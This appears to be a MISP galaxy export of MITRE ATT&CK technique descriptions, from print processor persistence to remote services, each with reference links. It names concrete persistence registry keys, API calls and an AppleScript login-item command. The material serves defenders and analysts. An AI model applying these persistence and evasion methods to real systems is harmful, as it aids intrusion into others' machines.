https://fileinfo.com/extension/plist

https://taomm.org/vol1/pdfs.html

Print Processors - T1547.012

Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot.(Citation: Microsoft Intro Print Processors)

Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the <code>AddPrintProcessor</code> API call with an account that has <code>SeLoadDriverPrivilege</code> enabled. Alternatively, a print processor can be registered to the print spooler service by adding the <code>HKLM\SYSTEM\\[CurrentControlSet or ControlSet001]\Control\Print\Environments\\[Windows architecture: e.g., Windows x64]\Print Processors\\[user defined]\Driver</code> Registry key that points to the DLL.

For the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, that can be found with the <code>GetPrintProcessorDirectory</code> API call, or referenced via a relative path from this directory.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020)

The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.

The tag is: misp-galaxy:mitre-attack-pattern="Print Processors - T1547.012"

Table 6158. Table References

Links

https://attack.mitre.org/techniques/T1547/012

https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor

https://learn.microsoft.com/windows-hardware/drivers/print/introduction-to-print-processors

https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/

PowerShell Profile - T1546.013

Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (<code>profile.ps1</code>) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.

[PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles)

Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script will be executed unless the <code>-NoProfile</code> flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019)

An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)

The tag is: misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1546.013"

Table 6159. Table References

Links

http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf

https://attack.mitre.org/techniques/T1546/013

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6

https://docs.microsoft.com/powershell/module/microsoft.powershell.core/about/about_profiles

https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html

https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/

Active Setup - T1547.014

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account’s associated permissions level.

Adversaries may abuse Active Setup by creating a key under <code> HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\</code> and setting a malicious value for <code>StubPath</code>. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)

Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.

The tag is: misp-galaxy:mitre-attack-pattern="Active Setup - T1547.014"

Table 6160. Table References

Links

https://attack.mitre.org/techniques/T1547/014

https://citizenlab.ca/2015/12/packrat-report/

https://digital-forensics.sans.org/summit-archives/2010/35-glyer-apt-persistence-mechanisms.pdf

https://helgeklein.com/blog/2010/04/active-setup-explained/

https://securelist.com/whos-really-spreading-through-the-bright-star/68978/

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/

https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html

Login Items - T1547.015

Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.

Login items installed using the Service Management Framework leverage <code>launchd</code>, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.

Adversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://attack.mitre.org/techniques/T1059/002) to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as <code>tell application “System Events” to make login item at end with properties /path/to/executable</code>.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in <code>~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm</code>.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Login Items - T1547.015"

Table 6161. Table References

Links

http://www.hexed.in/2019/07/osxdok-analysis.html

https://attack.mitre.org/techniques/T1547/015

https://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/

https://blog.timschroeder.net/2013/04/21/smloginitemsetenabled-demystified/

https://developer.apple.com/documentation/coreservices/launch_services

https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1

https://developer.apple.com/library/archive/samplecode/LoginItemsAE/Introduction/Intro.html#//apple_ref/doc/uid/DTS10003788

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html

https://eclecticlight.co/2018/05/22/running-at-startup-when-to-use-a-login-item-or-a-launchagent-launchdaemon/

https://eclecticlight.co/2021/09/16/how-to-run-an-app-or-tool-at-startup/

https://gist.github.com/kaloprominat/6111584

https://objective-see.com/blog/blog_0x25.html

https://objective-see.com/blog/blog_0x31.html

https://objective-see.com/blog/blog_0x44.html

https://support.apple.com/guide/mac-help/open-items-automatically-when-you-log-in-mh15189/mac

https://www.sentinelone.com/blog/how-malware-persists-on-macos/

Installer Packages - T1546.016

Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)

Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS postinstall scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle evilquest parti)

Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include preinst, postinst, prerm, postrm scripts and run as root when executed.

For Windows, the Microsoft Installer services uses .msi files to manage the installing, updating, and uninstalling of applications. Adversaries have leveraged Prebuild and Postbuild events to run commands before or after a build when installing .msi files.(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts)

The tag is: misp-galaxy:mitre-attack-pattern="Installer Packages - T1546.016"

Table 6162. Table References

Links

https://attack.mitre.org/techniques/T1546/016

https://cpb-us-e1.wpmucdn.com/sites.psu.edu/dist/4/24696/files/2019/07/psumac2019-345-Installer-Package-Scripting-Making-your-deployments-easier-one-at-a-time.pdf

https://objective-see.com/blog/blog_0x59.html

https://redcanary.com/blog/mac-application-bundles/

https://securelist.com/operation-applejeus/87553/

https://www.debian.org/doc/debian-policy/ch-maintainerscripts.html#s-mscriptsinstact

Identify groups/roles - T1270

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1270).

Personnel internally to a company may belong to a group or maintain a role with electronic specialized access, authorities, or privilege that make them an attractive target for an adversary. One example of this is a system administrator. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Identify groups/roles - T1270"

Table 6163. Table References

Links

https://attack.mitre.org/techniques/T1270

Proxy/protocol relays - T1304

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1304).

Proxies act as an intermediary for clients seeking resources from other systems. Using a proxy may make it more difficult to track back the origin of a network communication. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Proxy/protocol relays - T1304"

Table 6164. Table References

Links

https://attack.mitre.org/techniques/T1304

Scheduled Task/Job - T1053

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent)

The tag is: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053"

Table 6165. Table References

Links

https://attack.mitre.org/techniques/T1053

https://technet.microsoft.com/en-us/library/cc785125.aspx

https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain

Scheduled Task/Job - T1603

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. On Android and iOS, APIs and libraries exist to facilitate scheduling tasks to execute at a specified date, time, or interval.

On Android, the WorkManager API allows asynchronous tasks to be scheduled with the system. WorkManager was introduced to unify task scheduling on Android, using JobScheduler, GcmNetworkManager, and AlarmManager internally. WorkManager offers a lot of flexibility for scheduling, including periodically, one time, or constraint-based (e.g. only when the device is charging).(Citation: Android WorkManager)

On iOS, the NSBackgroundActivityScheduler API allows asynchronous tasks to be scheduled with the system. The tasks can be scheduled to be repeating or non-repeating, however, the system chooses when the tasks will be executed. The app can choose the interval for repeating tasks, or the delay between scheduling and execution for one-time tasks.(Citation: Apple NSBackgroundActivityScheduler)

The tag is: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1603"

Table 6166. Table References

Links

https://attack.mitre.org/techniques/T1603

https://developer.android.com/topic/libraries/architecture/workmanager

https://developer.apple.com/documentation/foundation/nsbackgroundactivityscheduler

Develop KITs/KIQs - T1227

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1227).

Leadership derives Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) from the areas of most interest to them. KITs are an expression of management’s intelligence needs with respect to early warning, strategic and operational decisions, knowing the competition, and understanding the competitive situation. KIQs are the critical questions aligned by KIT which provide the basis for collection plans, create a context for analytic work, and/or identify necessary external operations. (Citation: Herring1999)

The tag is: misp-galaxy:mitre-attack-pattern="Develop KITs/KIQs - T1227"

Table 6167. Table References

Links

https://attack.mitre.org/techniques/T1227

System Shutdown/Reboot - T1529

Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. <code>reload</code>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)

Shutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.

Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)

The tag is: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529"

Table 6168. Table References

Links

https://attack.mitre.org/techniques/T1529

https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html

https://blog.talosintelligence.com/2018/02/olympic-destroyer.html

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown

https://www.cisa.gov/uscert/ncas/alerts/TA18-106A

Virtualization/Sandbox Evasion - T1633

Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors after checking for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware’s behavior to disengage from the victim or conceal the core functions of the payload. They may also search for VME artifacts before dropping further payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1633) during automated discovery to shape follow-on behaviors.

Adversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1633) such as checking for system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment.

The tag is: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1633"

Table 6169. Table References

Links

https://attack.mitre.org/techniques/T1633

Virtualization/Sandbox Evasion - T1497

Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)

Adversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497"

Table 6170. Table References

Links

https://attack.mitre.org/techniques/T1497

https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc

https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/

Data Obfuscation - T1001

Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.

The tag is: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001"

Table 6171. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1001

Web Shell - T1100

A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013)

Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary’s primary access methods are detected and removed.

The tag is: misp-galaxy:mitre-attack-pattern="Web Shell - T1100"

Table 6172. Table References

Links

https://attack.mitre.org/techniques/T1100

https://capec.mitre.org/data/definitions/650.html

https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html

https://www.us-cert.gov/ncas/alerts/TA15-314A

Automated Exfiltration - T1020

Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.

When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).

The tag is: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020"

Table 6173. Table References

Links

https://attack.mitre.org/techniques/T1020

Hardware Additions - T1200

Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.

While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012)

The tag is: misp-galaxy:mitre-attack-pattern="Hardware Additions - T1200"

Table 6174. Table References

Links

https://arstechnica.com/information-technology/2012/03/the-pwn-plug-is-a-little-white-box-that-can-hack-your-network/

https://attack.mitre.org/techniques/T1200

https://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html

https://www.youtube.com/watch?v=fXthwl6ShOg

https://www.youtube.com/watch?v=lDvf4ScWbcQ

Data Compressed - T1002

An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.

The tag is: misp-galaxy:mitre-attack-pattern="Data Compressed - T1002"

Table 6175. Table References

Links

https://attack.mitre.org/techniques/T1002

https://en.wikipedia.org/wiki/List_of_file_signatures

Network Sniffing - T1040

Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.

Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.

In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)

On network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as monitor capture.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)

The tag is: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040"

Table 6176. Table References

Links

https://attack.mitre.org/techniques/T1040

https://cloud.google.com/vpc/docs/packet-mirroring

https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html

https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview

https://posts.specterops.io/through-the-looking-glass-part-1-f539ae308512

https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/

https://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/ios-embedded-packet-capture/116045-productconfig-epc-00.html

https://www.us-cert.gov/ncas/alerts/TA18-106A

New Service - T1050

When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service’s configuration information, including the file path to the service’s executable, is stored in the Windows Registry.

Adversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with [Masquerading](https://attack.mitre.org/techniques/T1036). Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1035).

The tag is: misp-galaxy:mitre-attack-pattern="New Service - T1050"

Table 6177. Table References

Links

https://attack.mitre.org/techniques/T1050

https://capec.mitre.org/data/definitions/550.html

https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697

https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection

https://technet.microsoft.com/en-us/library/cc772408.aspx

https://technet.microsoft.com/en-us/sysinternals/bb963902

Weaken Encryption - T1600

Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)

Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.

Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)

The tag is: misp-galaxy:mitre-attack-pattern="Weaken Encryption - T1600"

Table 6178. Table References

Links

https://attack.mitre.org/techniques/T1600

https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

Indicator Removal - T1070

Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.

Removal of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.

The tag is: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070"

Table 6179. Table References

Links

https://attack.mitre.org/techniques/T1070

Fallback Channels - T1008

Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.

The tag is: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008"

Table 6180. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1008

Binary Padding - T1009

Adversaries can use binary padding to add junk data and change the on-disk representation of malware without affecting the functionality or behavior of the binary. This will often increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.

Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blacklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)

The tag is: misp-galaxy:mitre-attack-pattern="Binary Padding - T1009"

Table 6181. Table References

Links

https://attack.mitre.org/techniques/T1009

https://capec.mitre.org/data/definitions/572.html

https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/

https://www.virustotal.com/en/faq/

https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/

Brute Force - T1110

Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.

Brute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access.

The tag is: misp-galaxy:mitre-attack-pattern="Brute Force - T1110"

Table 6182. Table References

Links

https://attack.mitre.org/techniques/T1110

Query Registry - T1012

Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.

The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

The tag is: misp-galaxy:mitre-attack-pattern="Query Registry - T1012"

Table 6183. Table References

Links

https://attack.mitre.org/techniques/T1012

https://en.wikipedia.org/wiki/Windows_Registry

Remote Services - T1021

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.

In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain.

Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)

The tag is: misp-galaxy:mitre-attack-pattern="Remote Services - T1021"

Table 6184. Table References

Links

http://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html

https://attack.mitre.org/techniques/T1021

https://images.apple.com/remotedesktop/pdf/ARD_Admin_Guide_v3.3.pdf

https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins

https://support.apple.com/en-us/HT201710

https://support.apple.com/en-us/HT209161

https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx

https://www.fireeye.com/blog/threat-research/2019/10/leveraging-apple-remote-desktop-for-good-and-evil.html

https://www.ssh.com/ssh

